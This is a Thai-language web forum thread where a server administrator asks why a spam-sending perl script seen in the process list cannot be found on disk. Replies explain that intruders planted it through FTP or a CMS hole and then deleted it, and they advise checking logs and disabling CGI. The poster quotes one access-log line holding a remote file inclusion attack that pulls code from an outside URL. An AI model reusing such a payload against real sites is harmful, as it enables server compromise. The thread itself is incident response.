คือมีปัญหาว่ามีคนมาแอบ วาง script perl .pl แล้วก็เรียก ส่งเมล์ไป spam คนอื่น
หาใน ps auxww
เจอ
./admirably.pl
./admirably.pl
แต่ผมไปค้นหา
find / -name admirably.pl
กลับไม่เจอนะครับ แบบนี้ มันเพราะอะไรเหรอครับ อ๋อทำการ secure /tmp แล้วด้วย แต่ก็ยังโดนเรียกอยู่ดี ขอบคุณครับ
เจอแบบนี้ใน log ลุกค้าไม่รู้วาน่าจะใช่ไหมครับ
/modules.php?name=Asers_Shop&s_op=viewproduct&cid=5%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://itnews.or.kr/id1.txt?
kke
4
ที่ไม่เจอเพราะมัน ftp เข้ามาวาง
พอ run อยู่ใน mem แล้ว ก็ ftp ลบไฟล์ออกเลย
น่าจะสามารถตรวจพบได้จาก ftp log ครับ
ลองลบ file ดังกล่าวแล้วก็ไม่หายนะครับ
เดี๋ยวลองเช็ค log ftp ดูครับ
icez
6
มีวาง shell อะไรไว้แล้วละมั้งครับงานนี้
ไล่ process ละเอียดๆ เลย
แล้วดู log ให้หมด
ปิด CGI สิครับ
ผมเคยเตือนเรื่องนี้มาหลายรอบแล้ว
มันใช้รูโหว่ของ CMS เจาะเข้ามา วาง script พอมัน run แล้วก็จะลบไฟล์ script นั้นๆออก
ถ้าเว็บนั้นไม่ได้ใช้งาน CGI ก็ปิดไปเลยครับ